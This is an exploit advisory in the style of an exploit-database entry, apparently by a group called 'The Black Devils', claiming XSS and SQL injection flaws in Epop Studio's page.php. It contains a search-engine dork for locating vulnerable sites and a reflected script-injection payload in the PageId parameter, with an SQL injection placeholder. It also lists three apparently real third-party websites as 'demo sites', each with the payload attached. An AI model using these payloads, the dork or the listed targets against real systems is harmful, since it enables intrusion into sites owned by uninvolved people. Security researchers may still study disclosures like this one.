# Exploit Title: Epop Studio XSS/SQL Injection Vulnerabilities
# Date: 05/10/2012
# Author: The Black Devils
# Software Link: http://epopstudio.com/
# Category : [ webapps ]
# Dork : Site By Epop Studio inurl:page.php?pid=
# Type : php
# Tested on: [Windows] & [Ubuntu]
-------------------------------
http:\Localhost\[Path]\page.php?PageId= '"><script>alert(1337);</script>'
http:\Localhost\[Path]\page.php?PageId=[sql injection]
-------------------------------
# Demo site:
http://www.florencefreedom.com/page.php?pID='"><script>alert(1337);</script>'
http://www.953wiki.com/page.php?pID='"><script>alert(1337);</script>'
http://www.aftonalps.com/page.php?pID='"><script>alert(1337);</script>'
-----------
Contact:
# Youtube : www.youtube.com/user/Th3BlackDevils
# Facebook : www.facebook.com/DevilsDz
# Email : mr.k4rizma@gmail.com
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information